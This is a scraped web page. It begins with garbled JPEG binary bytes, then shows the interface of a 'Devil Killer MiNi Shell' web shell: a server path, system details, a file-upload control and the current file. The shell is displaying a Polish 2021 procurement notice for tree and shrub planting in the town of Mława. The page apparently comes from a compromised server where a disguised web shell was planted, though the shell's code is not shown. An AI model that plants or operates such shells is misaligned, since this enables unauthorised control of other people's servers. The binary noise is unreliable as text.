JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210811/0014613601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00146136 z dnia 2021-08-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> "Poprawa jakości powietrza na terenie Miasta Mława poprzez utworzenie nowych obszarów zieleni – etap I" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO MŁAWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130377830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stary Rynek 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">23 654 33 82</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@mlawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mlawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> "Poprawa jakości powietrza na terenie Miasta Mława poprzez utworzenie nowych obszarów zieleni – etap I" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-09f427c2-fa9c-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00146136</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000659/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 „Poprawa jakości powietrza na terenie Miasta Mława poprzez utworzenie nowych obszarów zieleni – etap I”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.mlawa.pl/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy Wykonawcami i Zamawiającym w przedmiotowym postępowaniu możliwa jest jedynie za pomocą środków komunikacji elektronicznej tj. przy użyciu miniPortalu, udostępnionego na stronie: https://miniportal.uzp.gov.pl/ zintegrowanego z dedykowanymi formularzami na e- PUAP, za pomocą których można składać oferty oraz komunikować się z Zamawiającym, korzystając z następujących formularzy: formularz do złożenia, zmiany, wycofania oferty oraz formularz do komunikacji.<br/>UWAGA: Czynności podjęte przez Wykonawcę przy użyciu poczty elektronicznej będą bezskuteczne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca we wszelkiej korespondencji związanej z niniejszym postępowaniem posługuje się identyfikatorem postępowania, dostępnym na Liście wszystkich postępowań na miniPortalu. Link do postępowania oraz ID (32 znakowym) postępowania z miniPortalu Zamawiający przekaże Wykonawcom w dniu zamieszczenia SWZ na stronie internetowej prowadzonego postępowania.<br/>2. Wymagania sprzętowo – aplikacyjne, umożliwiające Wykonawcom wzięcie udziału w postępowaniu:<br/>1) posiadanie (założenie) przez Wykonawcę konta na ePUAP,<br/>2) dysponowanie urządzeniem teleinformatycznym z dostępem do sieci Internet,<br/>3) system operacyjny MS Windows,<br/>4) zainstalowana jedna z przeglądarek internetowych: Microsoft Internet Explorer od wersji 11.0, Mozilla Firefox od wersji 15, Google Chrome od wersji 20, Microsoft Edge<br/>5) włączona obsługa JavaScript,<br/>6) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdt<br/>7) zainstalowany program antywirusowy.<br/>8) aplikacja systemu miniPortal działa na Platformie Windows, Mac i Linux. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych jest następująca: <br/>a)	specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>b)	format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>c)	oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy,<br/>d)	integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>3. Dozwolone formaty plików: pdf, txt, doc, xls, docx, xlsx, csv i jpg są obsługiwane za pomocą ogólnie dostępnych aplikacji, narzędzi i urządzeń.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WI.271.20.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja zadania inwestycyjnego pn.: „Poprawa jakości powietrza na terenie Miasta Mława poprzez utworzenie nowych obszarów zieleni – etap I”. Zadanie polega na utworzeniu dwóch nowych terenów zielonych na należących do gminy terenach. <br/>1) W ramach zadania zostaną opracowane dwa, ostatecznie zaakceptowane przez Zamawiającego, projekty (UWAGA: Wykonawca przygotuje dwie koncepcje projektów dla każdej z lokalizacji oddzielnie w celu uzgodnienia z Zamawiającym i uwzględni co najmniej dwie konsultacje w tym zakresie), dla każdej z nw. lokalizacji oddzielnie, a także zostaną wykonane w nw. lokalizacjach roboty budowlane, w skład których wchodzą: roboty ziemne, wykonanie trawników na terenie płaskim, dywanowych siewem, nasadzenie drzew liściastych, nasadzenie krzewów liściastych, korowanie powierzchni pod drzewami i krzewami, montaż agrowłókniny ściółkującej. <br/>a)	Pierwszy obszar zlokalizowany jest przy ul. Padlewskiego, na działkach o numerach ewidencyjnych: 11-671, 11-673, 11-674, pozbawionych infrastruktury technicznej. Teren stanowi nieużytek. Obszar ten będzie miał charakter leśno-parkowy, dlatego realizacja zadania będzie skoncentrowana przede wszystkim na nasadzeniach n/w zieleni: <br/>- 150 szt. drzew liściastych: <br/>- 50 szt. krzewów liściastych:<br/>b)	Drugi obszar znajduje się w pobliżu ulicy Leszczyńskiego na działkach o numerach ewidencyjnych 10-2/34, 10-25/2, 10-24/1, 10-4550, 10-4551/1, pozbawionych infrastruktury technicznej. Teren stanowi nieużytek. W ramach zadania nasadzonych zostanie:<br/>- 18 szt. drzew liściastych:<br/>- 1 053 szt. krzewów liściastych:<br/>Teren przy ul. Leszczyńskiego będzie stanowił obszar o charakterze parkowym, do którego należy dostarczyć i zamontować ławki i kosze na śmieci. Dodatkowo należy dostarczyć i zamontować tablice edukacyjne nasadzonej flory, z oznaczeniami (logo) podmiotu dofinansowującego przedmiotowe zadanie. Na części obszaru należy wykonać trawnik, odgrodzony wysoką zielenią od strony zabudowy mieszkaniowej. W celu przemieszczania się wykonane zostaną ścieżki o nawierzchni zapewniającej filtrację wody i umożliwiające dostęp dla osób poruszających się na wózkach.<br/>2)	Na obydwóch terenach zostaną wykonane trawniki dywanowe siewem, przystosowane do intensywnego użytkowania.<br/>3)	Każda roślina, stanowiąca przedmiot zamówienia powinna mieć tzw. „paszport” tzn. czworokątną etykietę zawierającą flagę UE i napis „Paszport roślin / Plant Passport” oraz informacje zgodne z obowiązującymi przepisami. <br/>4)	Przed przystąpieniem do robót budowlanych, Wykonawca wykona pomiary geodezyjne na własny koszt. <br/>a) Po zakończeniu budowy Wykonawca jest zobowiązany przedłożyć Zamawiającemu w ilości 2 szt. geodezyjną inwentaryzację powykonawczą wraz z 2 egz. opracowanego projektu, powykonawczą inwentaryzację dendrologiczną (drzew i krzewów). <br/>5)	W czasie trwania robót budowlanych oraz w okresie gwarancyjnym wszelkie zbywające nadmiary gruntu bądź nieczystości, Wykonawca zagospodaruje we własnym zakresie i na własny koszt.<br/>6) Zakres czynności związanych z nasadzeniem drzew liściastych: <br/>a) zakup materiału roślinnego, 3-4 krotnie szkółkowanego, drzewa formy piennej o pokroju alejowym, korona z jednym przewodnikiem równomiernie rozgałęziona od wysokości 2,2 m, o obwodzie na wysokości 1m o obwodzie pnia 12-14 cm, zdrowe, wszystkie drzewa bez uszkodzeń na korze i pędach, w bryle owiniętej jutą lub siatką z drutu o średnicy min. 40 cm, <br/>b) wyznaczenie miejsc sadzenia wg opracowanego projektu, <br/>c) wykopanie dołów pod każde drzewo o wymiarach odpowiadających wielkości 1 m3, <br/>d) wypełnienie wykopanych dołów ziemią ogrodniczą z udziałem co najmniej 15 % gliny, zawartość materii organicznej 5%, o pH 5,7 – 6,5, o strukturze gruzełkowatej i wolnej od chwastów trwałych (perz, topinambur, itp.), z dodatkiem hydrożelu i obornika granulowanego (wg zaleceń producentów), wymagane jest warstwowe zagęszczanie gruntu w celu wykluczenia jego nadmiernego osiadania po wykonaniu nasadzeń, <br/>e) doniesienie roślin i wody, posadzenie (z uzupełnieniem podłoża) i dwukrotne podlanie, ok. 50 l pod każde drzewo podczas jednego podlewania, <br/>f) wykonanie przy każdym drzewie palisady zabezpieczającej skarpę z pali drewnianych o średnicy 6 cm na długości 1 m po półokręgu, pale na długości ok. 0,5 m impregnowane – środkami przedłużającymi trwałość drewna ale nie szkodzącymi drzewom i nie przedostającymi się do gruntu, pale wbite. <br/>g) opalikowanie trzema palikami drewnianymi impregnowanymi – środkami przedłużającymi trwałość drewna ale nie szkodzącymi drzewom i nie przedostającymi się do gruntu (średnica 6 cm, umocowanie palików listwami poprzecznymi (półwałkami o średnicy 5-6 cm) co najmniej na dwóch wysokościach (dolna listwa podwójna - dłuższa – na wysokości 20 cm nad gruntem, górna pojedyncza - krótsza), <br/>h) wykonanie miski o powierzchni minimum 1 m2, z zagłębieniem 7 cm poniżej istniejącego terenu, misa po uzupełnieniu korą powinna pozostawać na poziomie przyległych trawników,<br/>i) ściółkowanie mieloną korą drzew iglastych warstwą gr. 7 cm, <br/>j) wykonanie cięć korygujących z posmarowaniem ran środkiem grzybobójczym, <br/>k) wywóz odpadów,<br/>l) pielęgnacja nasadzonego materiału roślinnego do dnia bezusterkowego odbioru końcowego.<br/>Uwaga! Drzewa muszą posiadać dobrze wykształcony, prosty pojedynczy przewodnik. Korona drzewa równomiernie rozgałęziona z jednym przewodnikiem głównym i równomiernie rozmieszczonymi pędami bocznymi właściwym dla danego gatunku, wyrównanej grubości. Wszystkie części drzew muszą być pozbawione ran i śladów po świeżych cięciach o średnicy większej niż 1,5 cm. Drzewa powinny być wolne od szkodników i patogenów. Drzewa ze szkółek, poddane 3-4 krotnemu szkółkowaniu. Wymagane potwierdzenie ilości szkółkowań z dokumentów zakupu materiału roślinnego (posadzonych drzew).<br/>7)	Zakres czynności związany z wykonaniem nasadzeń krzewów: <br/>a) wyznaczenie miejsca sadzenia - zgodnie z projektem, <br/>b) przygotowanie gruntu pod rośliny (skupinę), poprzez wykorytowanie całej powierzchni przeznaczonej na skupiny na głębokość 30 cm, <br/>c) obszary przeznaczone pod nasadzenia uzupełnić 15 cm warstwą ziemią ogrodniczej (z udziałem co najmniej 15 % gliny, zawartość materii organicznej 5%, o pH 5,7 – 6,5), o strukturze gruzełkowatej i wolnej od chwastów trwałych (perz, topinambur, oset, itp.), z dodatkiem hydrożelu i obornika granulowanego (wg zaleceń producentów), <br/>d) uzupełnić wykopy ziemią ogrodniczą 5 cm poniżej przyległych terenów, zagęszczając poszczególne warstwy gruntu wodą, <br/>e) w przygotowane podłoże, poniżej 5 cm od przyległych nawierzchni, posadzić rośliny, a następnie uzupełnić warstwą kory do wysokości przyległych nawierzchni (ok. 5 cm grubości), <br/>f) wykonać cięcia korygujące z posmarowaniem ran środkiem grzybobójczym, <br/>g) wywieźć odpady. <br/>8)	Wykonanie dodatkowych czynności towarzyszących:<br/>a) zorganizowanie we własnym zakresie czasowego miejsca składania urobku, jego wywozu oraz utylizacji zarówno nadmiaru ziemi, gruzu, roślinności oraz elementów nie nadających się do ponownego wbudowania,<br/>b) koszt usług geodezyjnych z wykonaniem geodezyjnej i dendrologicznej inwentaryzacji powykonawczej,<br/>c) czynności przygotowawcze, realizowane na koszt Wykonawcy:<br/>- zabezpieczenie placu budowy, <br/>- ustawienie obiektów i urządzeń niezbędnych do realizacji przedmiotu zamówienia, <br/>- przygotowanie tablicy informacyjnej o następującej treści: „Zadanie pn. Poprawa jakości powietrza na terenie Miasta Mława poprzez utworzenie nowych obszarów zieleni – etap I realizowane przy pomocy środków z budżetu Województwa Mazowieckiego w ramach „Mazowieckiego Instrumentu Wsparcia Ochrony Powietrza i Mikroklimatu MAZOWSZE 2021”w dniach od……………do…………..,<br/>- dla potrzeb realizacji zamówienia Wykonawca zabezpiecza we własnym zakresie dostawę energii i wody (oraz inne ewentualnie media),<br/>d) Zamawiający nie przewiduje dodatkowego wynagrodzenia za:<br/>- dozór budowy i ochronę mienia,<br/>- zagospodarowanie placu budowy,<br/>- pracę Wykonawcy wykonywaną w dni wolne i po godzinach pracy w dniach roboczych. <br/>- brak oznakowania i konsekwencje spowodowane niewłaściwym oznakowaniem i zabezpieczeniem miejsca prowadzonych robót, <br/>- odpowiedzialność cywilną Wykonawcy wobec osób trzecich za wszelkie zdarzenia wynikłe z jego winy w trakcie realizacji całości przedmiotu zamówienia.<br/>e) Wykonawca zobowiązany jest :<br/>- odgrodzić strefę roboczą przed dostępem osób trzecich poprzez ogrodzenie, oznakowanie,<br/>- zapewnić bezpieczne przejścia piesze i dojazd pojazdów kołowych,<br/>- przestrzegać przepisów bhp i ppoż. w okresie realizacji robót,<br/>- prowadzić, w okresie trwania budowy, systematycznych prac porządkowych w rejonie placu budowy oraz utrzymać pobliskie układy drogowe w rejonie budowy w należytym stanie technicznym i czystości,<br/>- przyjąć technologię i organizację robót, która nie spowoduje dewastacji obiektów zlokalizowanych w sąsiedztwie placu budowy oraz dróg dojazdowych.<br/>- wywieźć na legalne wysypisko, składowisko lub złomowisko materiału z demontażu, gruzu z rozbiórek, odpadów budowlanych i śmieci,<br/>- nie wpuszczać na plac budowy pracowników firm nie działających na podstawie umów o podwykonawstwo lub dalsze podwykonawstwo, zaakceptowanych przez Zamawiającego.<br/>- zgłaszać do odbioru elementy ulegające zakryciu. W razie nie dopełnienia tego warunku <br/>2. Wykonawca zobowiązany jest na własny koszt odkryć roboty lub wykonać odpowiednie odkucia, otwory lub odkrywki niezbędne do zbadania wykonanych robót, a następnie przywrócić je do stanu pierwotnego. W przypadku niewykonania Zamawiający zastrzega sobie prawo zlecenia wykonania niezbędnych odkrywek na koszt i ryzyko Wykonawcy.<br/>3. Wykonawca zapewni warunki umożliwiające prawidłowe, staranne i terminowe wykonanie zadania, uwzględniające utrudnienia związane z sytuacją pandemiczną.<br/>4. W terminie 2 tygodni od daty zawarcia umowy Wykonawca zobowiązany jest do przedłożenia Zamawiającemu koncepcji projektów, o których mowa w ust. 1 pkt 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211600-8 - Sadzenie drzew</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77300000-3 - Usługi ogrodnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opisany jest w rozdziale XIX. OPIS KRYTERIÓW OCENY OFERT, WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT dokumentu SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie podstawowego okresu gwarancji jakości na wady fizyczne co do przedmiotu umowy (roboty budowlane)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegóły są opisane w poszczególnych rozdziałach dokumentu SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany postanowień Umowy wymagają formy pisemnej pod rygorem nieważności. <br/>2. Zamawiający zastrzega sobie prawo zmiany nieistotnych treści umowy oraz dokonania zmian, zawartych w §15 PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Przygotowaną ofertę Wykonawca szyfruje na miniPortalu (bezpośrednio, bez wymogu pobrania zewnętrznej aplikacji), odnajdując postępowanie za pomocą identyfikatora i przesyła na Elektroniczną Skrzynkę Podawczą na wskazany adres 